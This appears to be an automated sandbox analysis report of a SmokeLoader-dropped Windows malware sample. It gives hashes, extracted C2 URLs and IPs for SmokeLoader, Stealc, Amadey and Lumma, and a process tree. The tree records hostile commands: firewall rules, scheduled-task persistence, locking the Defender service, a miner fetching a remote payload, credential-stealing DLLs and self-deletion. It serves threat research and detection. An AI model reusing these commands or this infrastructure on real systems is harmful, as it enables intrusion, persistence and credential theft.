Resubmissions

22-03-2024 00:57

240322-baz2daea37 10

21-03-2024 22:17

240321-17gzhabh25 10

Analysis

  • max time kernel
    290s
  • max time network
    309s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    21-03-2024 22:17

General

  • Target

    01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe

  • Size

    232KB

  • MD5

    c8a94b7ff57e67498d621af4bc560022

  • SHA1

    ac302a7477cb2f67eee23cc64c69b8bc41b235ef

  • SHA256

    01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2

  • SHA512

    9444db827fd46a9e8b38f44fc29716f2f03be47c9bd89369b00308f14b5995a6149a1cf2cfbaab157795750794e2b929cf0db87b5eee9f73e6b8bff14e357a5f

  • SSDEEP

    3072:avIPm6dnTMRl6U9u/RzKiAHwbjetauENUMVon5GoNtHgfJPssqZvoh:pm6dnoGUSRzSXtau2Kn5HfAfJk

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://selebration17io.io/index.php

http://vacantion18ffeu.cc/index.php

http://valarioulinity1.net/index.php

http://buriatiarutuhuob.net/index.php

http://cassiosssionunu.me/index.php

http://sulugilioiu19.net/index.php

http://goodfooggooftool.net/index.php

http://nidoe.org/tmp/index.php

http://sodez.ru/tmp/index.php

http://uama.com.ua/tmp/index.php

http://talesofpirates.net/tmp/index.php

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

stealc

C2

http://185.172.128.209

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

lumma

C2

https://resergvearyinitiani.shop/api

https://herdbescuitinjurywu.shop/api

https://relevantvoicelesskw.shop/api

https://asleepfulltytarrtw.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 4 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 8 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • Windows security bypass 2 TTPs 7 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 48 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 10 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe
    "C:\Users\Admin\AppData\Local\Temp\01ebe7f4cc97e242454407843886d3116f6389fca73e6312cc7fc9156405fbb2.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4104
  • C:\Users\Admin\AppData\Local\Temp\20E.exe
    C:\Users\Admin\AppData\Local\Temp\20E.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:5072
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\905.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:304
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\905.dll
      2⤵
      • Loads dropped DLL
      PID:4188
  • C:\Users\Admin\AppData\Local\Temp\30D1.exe
    C:\Users\Admin\AppData\Local\Temp\30D1.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe
      "C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:96
      • C:\Users\Admin\AppData\Local\Temp\u2o.0.exe
        "C:\Users\Admin\AppData\Local\Temp\u2o.0.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious use of WriteProcessMemory
        PID:4176
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3876
          • C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe
            "C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe"
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4612
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4864
              • C:\Windows\SysWOW64\PING.EXE
                ping 2.2.2.2 -n 1 -w 3000
                7⤵
                • Runs ping.exe
                PID:520
      • C:\Users\Admin\AppData\Local\Temp\u2o.1.exe
        "C:\Users\Admin\AppData\Local\Temp\u2o.1.exe"
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:780
        • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
          "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4580
    • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
      "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:660
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1292
      • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
        "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
        3⤵
        • Windows security bypass
        • Executes dropped EXE
        • Windows security modification
        • Adds Run key to start application
        • Checks for VirtualBox DLLs, possible anti-VM trick
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:3568
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:924
        • C:\Windows\System32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          4⤵
            PID:2236
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              5⤵
              • Modifies Windows Firewall
              PID:4344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:3740
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:4000
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Manipulates WinMonFS driver.
            • Drops file in Windows directory
            PID:4856
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:3740
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              5⤵
              • Creates scheduled task(s)
              PID:64
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /delete /tn ScheduledUpdate /f
              5⤵
                PID:4596
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:4000
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:4944
              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                5⤵
                • Executes dropped EXE
                PID:2620
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • Creates scheduled task(s)
                PID:4628
              • C:\Windows\windefender.exe
                "C:\Windows\windefender.exe"
                5⤵
                • Executes dropped EXE
                PID:2580
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  6⤵
                    PID:5560
                    • C:\Windows\SysWOW64\sc.exe
                      sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                      7⤵
                      • Launches sc.exe
                      PID:5696
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  5⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  PID:5704
                • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                  5⤵
                  • Executes dropped EXE
                  PID:5664
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  5⤵
                    PID:5588
                  • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    5⤵
                      PID:1216
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                        PID:2640
                      • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                        5⤵
                          PID:2708
                  • C:\Users\Admin\AppData\Local\Temp\EasyAppns.exe
                    "C:\Users\Admin\AppData\Local\Temp\EasyAppns.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3068
                    • C:\Users\Public\Music\EasyApp.exe
                      "C:\Users\Public\Music\EasyApp.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:2228
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 984
                        4⤵
                        • Program crash
                        PID:2904
                  • C:\Users\Admin\AppData\Local\Temp\april.exe
                    "C:\Users\Admin\AppData\Local\Temp\april.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4236
                    • C:\Users\Admin\AppData\Local\Temp\is-OB1P9.tmp\april.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-OB1P9.tmp\april.tmp" /SL5="$600D0,1485356,54272,C:\Users\Admin\AppData\Local\Temp\april.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2296
                • C:\Users\Admin\AppData\Local\Temp\3B90.exe
                  C:\Users\Admin\AppData\Local\Temp\3B90.exe
                  1⤵
                  • Executes dropped EXE
                  PID:3036
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1008
                    2⤵
                    • Program crash
                    PID:2664
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1008
                    2⤵
                    • Program crash
                    PID:4656
                • C:\Users\Admin\AppData\Local\Temp\5822.exe
                  C:\Users\Admin\AppData\Local\Temp\5822.exe
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Drops file in Windows directory
                  PID:1256
                • C:\Users\Admin\AppData\Local\Temp\B278.exe
                  C:\Users\Admin\AppData\Local\Temp\B278.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2124
                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    2⤵
                      PID:4848
                  • C:\Users\Admin\AppData\Local\Temp\BC1D.exe
                    C:\Users\Admin\AppData\Local\Temp\BC1D.exe
                    1⤵
                    • Executes dropped EXE
                    • Writes to the Master Boot Record (MBR)
                    PID:1964
                  • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                    C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                    1⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Adds Run key to start application
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious use of SetThreadContext
                    PID:3524
                    • C:\Users\Admin\AppData\Local\Temp\1000836001\osminog.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000836001\osminog.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4116
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        3⤵
                          PID:3532
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 1172
                            4⤵
                            • Program crash
                            PID:2628
                      • C:\Users\Admin\AppData\Local\Temp\1000837001\goldprimeldlldf.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000837001\goldprimeldlldf.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1592
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          3⤵
                            PID:2612
                        • C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          PID:4640
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                          2⤵
                          • Loads dropped DLL
                          PID:3084
                          • C:\Windows\system32\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                            3⤵
                            • Blocklisted process makes network request
                            • Loads dropped DLL
                            PID:3096
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profiles
                              4⤵
                                PID:1048
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\855258223215_Desktop.zip' -CompressionLevel Optimal
                                4⤵
                                  PID:4892
                            • C:\Users\Admin\AppData\Local\Temp\1000875001\amadka.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000875001\amadka.exe"
                              2⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Drops file in Windows directory
                              PID:1752
                              • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Adds Run key to start application
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                PID:5288
                                • C:\Users\Admin\AppData\Local\Temp\1000022001\39617900c5.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000022001\39617900c5.exe"
                                  4⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  PID:6036
                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:5880
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                  4⤵
                                  • Loads dropped DLL
                                  PID:2404
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                    5⤵
                                    • Blocklisted process makes network request
                                    • Loads dropped DLL
                                    PID:5224
                                    • C:\Windows\system32\netsh.exe
                                      netsh wlan show profiles
                                      6⤵
                                        PID:5172
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\855258223215_Desktop.zip' -CompressionLevel Optimal
                                        6⤵
                                          PID:4892
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                      4⤵
                                      • Blocklisted process makes network request
                                      • Loads dropped DLL
                                      PID:5912
                                • C:\Users\Admin\AppData\Local\Temp\1000978001\fullwork.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000978001\fullwork.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:5124
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    3⤵
                                      PID:5528
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 604
                                        4⤵
                                        • Program crash
                                        PID:5924
                                  • C:\Users\Admin\AppData\Local\Temp\1000979001\TeamFour.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000979001\TeamFour.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:5540
                                  • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                    "C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:5264
                                  • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5244
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      3⤵
                                        PID:224
                                        • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
                                          "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:5716
                                        • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
                                          "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5680
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                          4⤵
                                            PID:5688
                                            • C:\Windows\SysWOW64\choice.exe
                                              choice /C Y /N /D Y /T 3
                                              5⤵
                                                PID:5672
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                          2⤵
                                          • Blocklisted process makes network request
                                          • Loads dropped DLL
                                          PID:5836
                                        • C:\Users\Admin\AppData\Local\Temp\1000986001\987123.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000986001\987123.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:1900
                                        • C:\Users\Admin\AppData\Local\Temp\1000999001\ISetup3.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000999001\ISetup3.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:4472
                                          • C:\Users\Admin\AppData\Local\Temp\u3g8.0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\u3g8.0.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:5860
                                          • C:\Users\Admin\AppData\Local\Temp\u3g8.1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\u3g8.1.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Checks SCSI registry key(s)
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:5480
                                        • C:\Users\Admin\AppData\Local\Temp\1001001001\yoffens_crypted_EASY.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1001001001\yoffens_crypted_EASY.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:5184
                                        • C:\Users\Admin\AppData\Local\Temp\1001002001\lumma2.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1001002001\lumma2.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5912
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            3⤵
                                              PID:5944
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 776
                                                4⤵
                                                • Program crash
                                                PID:4176
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 1132
                                                4⤵
                                                • Program crash
                                                PID:3772
                                          • C:\Users\Admin\AppData\Local\Temp\1001007001\blue2_A1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1001007001\blue2_A1.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3280
                                        • C:\Windows\windefender.exe
                                          C:\Windows\windefender.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • Modifies data under HKEY_USERS
                                          PID:5736
                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                          1⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:5544
                                        • C:\Users\Admin\AppData\Roaming\vufabtj
                                          C:\Users\Admin\AppData\Roaming\vufabtj
                                          1⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:4428
                                        • C:\Users\Admin\AppData\Roaming\dbfabtj
                                          C:\Users\Admin\AppData\Roaming\dbfabtj
                                          1⤵
                                          • Executes dropped EXE
                                          PID:5244
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 492
                                            2⤵
                                            • Program crash
                                            PID:4504
                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                          1⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
